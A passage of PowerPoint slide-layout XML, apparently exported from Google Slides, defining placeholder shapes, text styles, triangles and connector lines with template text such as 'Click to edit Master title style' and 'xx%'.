              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;104;p16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1242267" y="4434973"/>
            <a:ext cx="2638000" cy="77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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="105" name="Google Shape;105;p16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3442400" y="-1684000"/>
            <a:ext cx="5010000" cy="5578400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-83233" y="5101033"/>
            <a:ext cx="1728000" cy="1843200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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1069220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accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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flipH="1">
            <a:off x="2428633" y="3370167"/>
            <a:ext cx="7334800" cy="61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4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="4800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4057800" y="2044681"/>
            <a:ext cx="4076400" cy="116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8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buNone/>
              <a:defRPr sz="10666" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>xx%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;110;p17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4264200" y="4390916"/>
            <a:ext cx="3663600" cy="42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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="111" name="Google Shape;111;p17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8466817" y="-2001500"/>
            <a:ext cx="5010000" cy="5578400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Google Shape;112;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-85600" y="5101033"/>
            <a:ext cx="1728000" cy="1843200"/>
          </a:xfrm>
          <a:prstGeom prst="rtTriangl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17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7011867" y="-317233"/>
            <a:ext cx="15205200" cy="7792400"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>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 name="Google Shape;114;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="-7185400" y="-2882633"/>
            <a:ext cx="15205200" cy="7792400"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>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17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948367" y="5151367"/>
            <a:ext cx="3876400" cy="19868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17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1477300" y="-741433"/>
            <a:ext cx="3876400" cy="19868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2220571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accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 117"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6394833" y="-290100"/>
            <a:ext cx="5797200" cy="74932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119" name="Google Shape;119;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="1920267"/>
            <a:ext cx="5145200" cy="704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None/>
              <a:defRPr sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buNone/>
              <a:defRPr sz="2667" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Google Shape;120;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="950967" y="3017733"/>
            <a:ext cx="4534400" cy="17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sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1"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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>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spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>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121" name="Google Shape;121;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123800" y="719333"/>
            <a:ext cx="1066800" cy="1143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8592770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accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 122"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Google Shape;123;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1797633" y="927000"/>
            <a:ext cx="8762800" cy="500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19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4178200" y="-30367"/>
            <a:ext cx="3835600" cy="17276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19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3356633" y="3135947"/>
            <a:ext cx="5478800" cy="1978800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="609585" lvl="0" indent="-431789" rtl="0">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marL="1219170" lvl="1" indent="-397923" algn="just" rtl="0">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marL="1828754" lvl="2" indent="-397923" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="2438339" lvl="3" indent="-397923" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="3047924" lvl="4" indent="-397923" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="3657509" lvl="5" indent="-397923" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="4267093" lvl="6" indent="-397923" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="4876678" lvl="7" indent="-397923" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>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marL="5486263" lvl="8" indent="-397923" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>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a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Google Shape;126;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2250600" y="2028433"/>
            <a:ext cx="76908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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121438897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solidFill>
          <a:schemeClr val="accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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1149933" y="4557448"/>
            <a:ext cx="23516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129" name="Google Shape;129;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565933" y="4879215"/>
            <a:ext cx="3519600" cy="10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130" name="Google Shape;130;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8701007" y="4557448"/>
            <a:ext cx="23516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131" name="Google Shape;131;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8117001" y="4879215"/>
            <a:ext cx="3519600" cy="10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132" name="Google Shape;132;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4920200" y="4557448"/>
            <a:ext cx="23516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133" name="Google Shape;133;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336197" y="4879215"/>
            <a:ext cx="3519600" cy="10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134" name="Google Shape;134;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2250600" y="707633"/>
            <a:ext cx="76908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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187744279"/>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accent5"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
